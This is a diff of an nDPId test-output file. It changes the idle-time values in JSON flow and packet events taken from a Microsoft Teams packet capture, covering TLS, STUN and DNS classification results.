-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} -00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"} 
+00890{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2430,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041682376,"flow_last_seen":1587041692001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9509,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1587041692001,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"northeurope.notifications.teams.microsoft.com","ja3":"ebf5e0e525258d7a8dcb54aa1564ecbd","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692528,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1587041692528,"l3_proto":"ip4","src_ip":"151.11.50.139","dst_ip":"192.168.1.6","src_port":2222,"dst_port":54750,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2438,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1587041692528,"pkt":"KDc3AG3IEBMx8Tl2CABFAACscMtAADIGTDyXCzKLwKgBBgiu1d6yibcLw8sjj4AYAfWSMAAAAQEICnMgXuAwhCbwdBDZH1X2LNSHenV0XPT5UOuNQPq3DAtDODIIsZ4L3xE8W9ceOtMh\/taRn1i3oYCG\/lk5DiXu3JH7RFT8gb0ANFHp9LfVVHPD+A0sB0\/WJaUdO\/QQPvH9sYa9nCylNS5SUfWnuhHHtKPL+2Ql1DSrQI\/KjFfe6Sr3"} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2439,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAA0AABAAEAGrzfAqAEGlwsyi9XeCK7DyyOPsom3g4AQD\/zTvAAAAQEICjCE1UVzIF7g"} +00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2440,"source":"teams.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1587041692528,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":1587041692528,"pkt":"EBMx8Tl2KDc3AG3ICABFSAB8AABAAEAGru\/AqAEGlwsyi9XeCK7DyyOPsom3g4AYEADukgAAAQEICjCE1UVzIF7g5AplDBJ5jEkO1U2Mpra9\/PbG6UC\/FVXGQ5pEnr4zSbP3LnLXhdyZOGgH9qsJLTZHLgDXKr5t+q9K3Mvbm5JFapBhK16BH5zD"} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041692611} 
00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2442,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041692578,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} -01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041692808,"flow_last_seen":1587041692808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041692808,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2443,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1587041692808,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041692808,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG+gHAqAEGp2PXpOyWEVIVrX6QAAAAALAC\/\/9dQAAAAgQFtAEDAwUBAQgKMITWWwAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2444,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":2,"flow_last_seen":1587041692880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041692880,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGBganY9ekwKgBBhFS7JY0lYWJFa1+kaAS\/ohhIwAAAgQFrAQCCAoTeUD2MITWWwEDAwc="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2445,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":3,"flow_last_seen":1587041692880,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041692880,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+g3AqAEGp2PXpOyWEVIVrX6RNJWFioAQECx9\/QAAAQEICjCE1qITeUD2"} 
+01040{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2446,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041692808,"flow_last_seen":1587041692881,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1587041692881,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01094{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2448,"source":"teams.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1587041692808,"flow_last_seen":1587041692953,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1587041692953,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"167.99.215.164","src_port":60566,"dst_port":4434,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"dati.ntop.org","ja3":"7120d65624bcd2e02ed4b01388d84cdb","ja3s":"410b9bedaf65dd26c6fe547154d60db4","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041693412} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":2463,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041693383,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2464,"source":"teams.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693428,"flow_last_seen":1587041693428,"flow_idle_time":180000,"flow_min_l4_payload_len":977,"flow_max_l4_payload_len":977,"flow_tot_l4_payload_len":977,"flow_avg_l4_payload_len":977,"midstream":0,"thread_ts_msec":1587041693428,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":51681,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -390,22 +390,22 @@ 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00528{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":1,"flow_last_seen":1587041693515,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":110,"pkt_l4_len":76,"thread_ts_msec":1587041693515,"pkt":"EBMx8Tl2KDc3AG3ICABFAABg5p0AAEARo1PAqAEGNHL6e8NgDZYATAKlAAMAMCESpEKyND9uZ\/QdWKy6Y58ADwAEcsZLxoA3AAQAAAACgAgABAAAAAaABgAEAAAAAQAQAAQAAC7ggFUABAACAAI="} 00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2482,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693515,"flow_last_seen":1587041693515,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1587041693515,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693516,"flow_last_seen":1587041693516,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041693516,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2483,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1587041693516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041693516,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGShzAqAEGNHL6e8NiAbvwxDFFAAAAALAC\/\/9VoQAAAgQFtAEDAwUBAQgKMITZEwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1587041693517,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":109,"pkt_l4_len":75,"thread_ts_msec":1587041693517,"pkt":"EBMx8Tl2KDc3AG3ICABFAABfDxsAAP8RKRvAqAEGwKgBAdnVADUASzsZd8IBAAABAAAAAAAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAQ=="} 
00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2484,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041693517,"flow_last_seen":1587041693517,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":67,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1587041693517,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00628{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":2,"flow_last_seen":1587041693530,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1587041693530,"pkt":"KDc3AG3IEBMx8Tl2CABFAACrU5xAADkRak7AqAEBwKgBBgA12dUAlwAAd8KBgAABAAAAAQAAEmItdHItdGVhbXMtZXVuby0wNQtub3J0aGV1cm9wZQhjbG91ZGFwcAVhenVyZQNjb20AABwAAcAfAAYAAQAAAAUAQARwcmQxDmF6dXJlZG5zLWNsb3VkA25ldAAGbXNuaHN0CW1pY3Jvc29mdMA6AAAnEQAAA4QAAAEsAAk6gAAAADw="} 
00815{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2485,"source":"teams.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041693517,"flow_last_seen":1587041693530,"flow_idle_time":180000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"thread_ts_msec":1587041693530,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":55765,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Azure","breed":"Acceptable","category":"Cloud"},"dns": {"query":"b-tr-teams-euno-05.northeurope.cloudapp.azure.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041693561,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGSjTAqAEGNHL6e8NiAbvwxDFGjkDaLFAQIABPogAA"} 
-00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2488,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041693516,"flow_last_seen":1587041693561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1587041693561,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"euaz.tr.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2486,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1587041693561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041693561,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0nZBAAGwGgJc0cvp7wKgBBgG7w2KOQNor8MQxRoAS\/\/8u4wAAAgQFoAEDAwgBAQQC"} 